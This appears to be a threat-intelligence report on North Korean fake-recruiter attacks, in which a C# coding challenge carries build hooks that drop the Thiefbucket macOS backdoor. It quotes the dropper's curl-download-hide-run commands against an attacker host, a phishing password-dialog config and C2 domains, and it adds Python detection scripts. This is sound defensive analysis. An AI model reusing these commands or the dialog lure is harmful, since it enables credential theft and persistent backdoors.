Short Summary:
On September 3, 2024, the FBI warned the crypto industry about North Korea’s use of social engineering techniques to deliver malware. Jamf Threat Labs has observed targeted attacks where individuals are contacted via professional networking platforms, leading to the installation of malware disguised as coding challenges. These attacks utilize sophisticated methods to exploit human vulnerabilities, with malware capable of stealing information and maintaining persistence on infected systems.
Key Points:
- The FBI issued a warning about North Korea targeting individuals in the crypto industry.
- Attacks often begin with social media outreach, particularly on professional networking sites.
- Malware is delivered through fake job offers and coding challenges.
- Two main malware payloads identified: VisualStudioHelper and zsh_env.
- Both payloads exhibit similar functionalities but differ in persistence methods and capabilities.
- Thiefbucket (also known as Rustdoor) is associated with these attacks, featuring infostealer capabilities.
- Organizations are advised to train employees to be cautious of unsolicited requests to run software.
MITRE ATT&CK TTPs – created by AI
- Social Engineering (Tactics: Initial Access)
- Actors scout victims on social media platforms.
- Impersonation of recruiters to gain trust.
- Malicious File Execution (Tactics: Execution)
- Malware delivered through zipped coding challenges.
- Execution of non-standard or unknown packages.
- Persistence (Tactics: Persistence)
- VisualStudioHelper uses cron for persistence.
- zsh_env persists via the .zshrc configuration file.
- Credential Access (Tactics: Credential Access)
- Malware prompts users for passwords through deceptive dialog boxes.
- Command and Control (Tactics: Command and Control)
- Malware communicates with command and control servers.
On September 3, 2024, the Federal Bureau of Investigation (FBI) released a public service announcement to warn those in the crypto industry that the Democratic People’s Republic of Korea (“DPRK”, aka North Korea) has been targeting individuals with clever social engineering techniques in order to deliver malware.
Authors: Jaron Bradley and Ferdous Saljooki
The DPRK has a long history of acquiring financial gains through creative and illicit means. Over the years, a significant portion of these financial gains has come from successful cyberattacks. As mentioned by the FBI’s public service announcement, specific individuals within crypto companies are being targeted.
As part of Jamf’s ongoing research, Jamf Threat Labs had been proactively monitoring attacks that closely aligned with these warnings. Below, we provide detailed insights into the nature of these attacks in order to provide others with the knowledge needed to better identify and mitigate potential threats. The majority of attacks begin with an individual reaching out over a social media platform leading to the delivery of malware in some manner.
Social engineering
Humans have long been considered the weakest link in the cybersecurity chain, and attackers continue to exploit this vulnerability through increasingly sophisticated social engineering tactics. Social engineering schemes often target individuals through professional networking platforms, making users the first line of defense but also the most vulnerable.
Per the FBI announcement:
Before initiating contact, the actors scout prospective victims by reviewing social media activity, particularly on professional networking or employment-related platforms.
Jamf Threat Labs noted an attack attempt in which a user was contacted on LinkedIn by an individual claiming to be a recruiter on the HR team at a tech company that specializes in decentralized finance.
LinkedIn profile impersonating an HR professional and used to contact potential victims
Note at the bottom of the image that this profile has 0 followers which can be a good indicator that this account was created recently. Much of this profile and the techniques used align with further documentation within the FBI announcement.
“The actors may also impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate.”
Although we are unfamiliar with the website ston.fi and can’t speak to its legitimacy, the recruiter claiming to work there is clearly meant to capture the target’s interest.
Code execution attempts
The FBI announcement goes on to document a number of ways in which the fraudulent recruiter might convince a user to install malware. The attack scenario observed by Jamf Threat Labs was closest to the second bullet point of the writeup.
- Requests to conduct a “pre-employment test” or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
In the observed scenario, the recruiter sent the target a zipped coding challenge (51a88646f9770e09b3505bd5cbadc587abb952ba), which is a fairly common step in the screening process for a modern-day development role. The coding challenge came in the form of a Visual Studio project that has the developer focus on converting Slack messages to CSV format in C#. However, buried within two separate csproj files are malicious bash commands that each download a second-stage payload. The two csproj files can be seen at the following locations:
TestProject/SlackToCsv.csproj
TestProject/SlackToCsv.Test/SlackToCsv.Test.csproj
The following bash commands will execute upon building the project:
<Exec Command="bash -c 'cd /Users/$USER/Library/ && curl -O -s https://taurihostmetrics[.]com/cloud/VisualStudioHelper && chmod +x VisualStudioHelper && chflags hidden VisualStudioHelper && ./VisualStudioHelper'"/>
<Exec Command="bash -c 'cd /Users/$USER/.config && curl -O -s https://taurihostmetrics[.]com/cloud/zsh_env && chmod +x zsh_env && chflags hidden zsh_env && ./zsh_env'"/>
</Target>
Both commands change their working directory and then download a second-stage payload via curl from taurihostmetrics[.]com.
f669fba857401406db6b35958d5f57d9d8030f56 -> VisualStudioHelper
5ec7497107478f08ca5018bf659f9340880c059c -> zsh_env
Each payload is marked as executable and then hidden before being run. These two executables are both stage two malware. VisualStudioHelper communicates with wiresapplication[.]com while zsh_env communicates with juchesoviet48[.]com.
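As an added illustration (not code from the Jamf post or from the attacker's project), the following Python scans a .csproj for build-time Exec commands and flags the download-chmod-hide-run pattern described above. The sample project, its target names and the host name dropper.invalid are constructed placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the csproj layout described above; it is not the
# attacker's project file, and the host name is a placeholder.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="bash -c 'cd /Users/$USER/Library/ &amp;&amp; curl -O -s https://dropper.invalid/cloud/Helper &amp;&amp; chmod +x Helper &amp;&amp; chflags hidden Helper &amp;&amp; ./Helper'"/>
  </Target>
  <Target Name="Banner" AfterTargets="Build">
    <Exec Command="echo build finished"/>
  </Target>
</Project>"""

# Tokens that rarely belong in a legitimate build step: fetching from the network,
# marking a file executable, hiding it, and running it from a home-directory location.
RISKY = ["bash -c", "curl ", "wget ", "chmod +x", "chflags hidden",
         "osascript", "base64 -d", "base64 --decode", "/Library/", "/.config/"]

def _local(tag):
    """Strip the MSBuild XML namespace that older, non-SDK csproj files declare."""
    return tag.rsplit("}", 1)[-1]

def scan_csproj(xml_text):
    """Return every command the build would run, with the risky tokens it contains."""
    findings = []
    root = ET.fromstring(xml_text)
    for target in root.iter():
        if _local(target.tag) != "Target":
            continue
        for exec_ in target.iter():
            if _local(exec_.tag) == "Exec" and exec_.get("Command"):
                cmd = exec_.get("Command")
                findings.append({"target": target.get("Name"), "command": cmd,
                                 "hits": [t for t in RISKY if t in cmd]})
    # Legacy projects can also run commands from <PreBuildEvent>/<PostBuildEvent> properties.
    for prop in root.iter():
        if _local(prop.tag) in ("PreBuildEvent", "PostBuildEvent") and (prop.text or "").strip():
            cmd = prop.text.strip()
            findings.append({"target": _local(prop.tag), "command": cmd,
                             "hits": [t for t in RISKY if t in cmd]})
    return findings

def risky_findings(xml_text):
    """Only the build commands that should stop a reviewer from hitting Build."""
    return [f for f in scan_csproj(xml_text) if f["hits"]]

if __name__ == "__main__":
    for f in risky_findings(SAMPLE_CSPROJ):
        print(f"[{f['target']}] {', '.join(f['hits'])}\n    {f['command']}")
```

Run it over every csproj in an unsolicited "coding challenge" before opening the solution in an IDE, since the IDE's build will execute these commands without further prompting.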
The stage two malware that is dropped by the coding challenge is tracked by Jamf Threat Labs under the name Thiefbucket but is known to some as “Rustdoor.” Jamf Threat Labs has always attributed this malware to the ongoing DPRK activity due to the stage one techniques and the manner in which they are delivered to their targets.
Stage two: comparison of configuration
As mentioned in the above section, two executables were downloaded and executed by the fake coding challenge. These two executables are nearly identical in functionality. What primarily sets them apart is their embedded configurations.
The config files embedded within the two malware samples show that VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file.
Further down, line 19 shows that VisualStudioHelper has a configuration setting called “files” set to true. This setting causes the malware to act as an infostealer by grabbing a number of different files specified further down in the config. In order to acquire some of the most valuable files, infostealers often require further permissions. The malware obtains these permissions via a popup window, and this prompt is also defined within the config file.
{
"id": 6,
"name": "Visual Studio",
"path": "/Applications/Visual Studio.app/",
"icon": "/Applications/Visual Studio.app/Contents/Resources/VisualStudio.icns",
"exec": "VisualStudio",
"show_dialog": true,
"dialog_title": "Visual Studio Setup",
"dialog_msg": "Visual Studio requires permission to compilation projects. Please enter password for <username>"
}
The above excerpt shows a portion of the config within the VisualStudioHelper payload that will cause the malware to prompt the user for their password using a prompt window that is tailored to look as though it originated from Visual Studio. Given that this prompt is displayed at the same time the project is built, the user may be more likely to think nothing of it and enter their password.
The other stage two payload (zsh_env) simply sets up persistence via the .zshrc configuration file. This ensures that the malware is executed every time the user opens a zsh shell from then on. This technique is likely to be reliable given that the attacker knows they are targeting a developer, who will in all likelihood use the Terminal, causing the backdoor to be run in the background again and again.
In summary: both payloads are highly similar. The differences between the two are:
- VisualStudioHelper acts as an automated infostealer, can operate as a standard backdoor when invoked by cron and communicates with wiresapplication[.]com.
- zsh_env operates as a backdoor, does not automate any of the infostealer functionality, persists via the zshrc config file, and uses a command and control server at juchesoviet48[.]com.
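To show how the two persistence mechanisms just described can be triaged on a host, here is an added Python example (not from the Jamf post) that parses crontab and ~/.zshrc text for commands launched directly from ~/Library or ~/.config and checks whether a hit carries the BSD hidden flag set by chflags. The crontab and rc lines are constructed samples, and the user name dev is a placeholder.

```python
import os
import re
import stat

# Constructed sample lines (not from an infected host) mirroring the two persistence
# styles described above: a crontab entry and lines appended to ~/.zshrc.
SAMPLE_CRONTAB = """# m h dom mon dow command
*/5 * * * * /Users/dev/Library/VisualStudioHelper
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
"""
SAMPLE_ZSHRC = """export PATH="$HOME/.cargo/bin:$PATH"
alias ll='ls -la'
/Users/dev/.config/zsh_env &
~/.config/zsh_env --daemon >/dev/null 2>&1 &
"""
# Spellings of the home directory seen in rc files and crontabs, and the two
# directories the dropper used; a bare executable launched from there deserves a look.
HOME_PREFIX = re.compile(r"(?:~|\$HOME|/Users/(?:\$USER|[^/\s]+))")
WATCHED = ("/Library/", "/.config/")

def normalize(path):
    """Rewrite the home-directory prefix to '~' so paths compare across users."""
    return HOME_PREFIX.sub("~", path, count=1)

def _command_part(line, kind):
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if kind == "crontab":
        fields = line.split(None, 5)  # five schedule fields, then the command
        return fields[5] if len(fields) == 6 else None
    return line  # rc file: the whole line is shell

def triage(text, kind):
    """(normalized exe, original line) for each command run from ~/Library or
    ~/.config; kind is 'crontab' or 'rc'."""
    findings = []
    for line in text.splitlines():
        cmd = _command_part(line, kind)
        if not cmd:
            continue
        exe = normalize(cmd.split()[0])
        if exe.startswith("~") and any(w in exe for w in WATCHED):
            findings.append((exe, line.strip()))
    return findings

def is_hidden(path):
    """True if the file carries the BSD hidden flag that chflags sets (macOS only)."""
    try:
        return bool(os.stat(os.path.expanduser(path)).st_flags & stat.UF_HIDDEN)
    except (AttributeError, OSError):
        return False
```

On a real host, feed triage() the contents of ~/.zshrc with kind 'rc' and the output of crontab -l with kind 'crontab', then call is_hidden() on each hit to see whether the binary was hidden the way both payloads were.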
Stage two capabilities and updates
Since its original discovery, Thiefbucket has held the following capabilities:
- Automation of infostealer-like logic
- Download files
- Upload files
- Kill processes
- Delete files and directories
- Sleep
- Quickly search indexed files using Spotlight
- Ability to self delete
- Ability to run shell commands
- Ability to prompt the user with dialog boxes
- Ability to persist via LaunchAgent, cron, dock, and zshrc profiles.
The malware has a handful of differences from its first appearance; most notably, the executable that was originally written in Rust appears to have been re-created in Objective-C.
Jamf Threat Labs continues to investigate the differences in features, but at a first glance they appear to be minor. The help page for the malware has been updated with a handful of new arguments. Most of these appear to be ways to run or test the embedded config features. We’ve marked the new available arguments below with asterisks.
./zsh_env --help
Usage: zsh_env [OPTIONS]
Options:
-l, --launch-agent Launch agent mode
-r, --remove-agent Remove launch agent
-d, --daemon Daemon mode
-u, --unlock Remove lock file
--inject-launch Starter as injected launch agent *
--inject-rc Starter as injected rc *
--bin <PATH TO BINARY> Path to packed binary *
--dialog *
--test-dialog Dialogue to test *
-h, --help Print help
-V, --version Print version
It’s worth noting that the VisualStudioHelper payload makes use of the --dialog argument when it prompts the user for their password.
When testing the --bin argument, we observed that Thiefbucket will add the supplied binary path to the zshrc file before deleting itself.
Conclusion
Threat actors continue to find new ways to pursue those in the crypto industry. Jamf Threat Labs has seen attacks in line with the FBI warning that went out this month. It’s important to train your employees, including your developers, to be hesitant to trust those who connect on social media and ask them to run software of any type. These social engineering schemes performed by the DPRK come from people who are well-versed in English and enter the conversation having thoroughly researched their target. We recommend reading the public service announcement for a list of mitigations and best practices.
Indicators
Source: https://www.jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/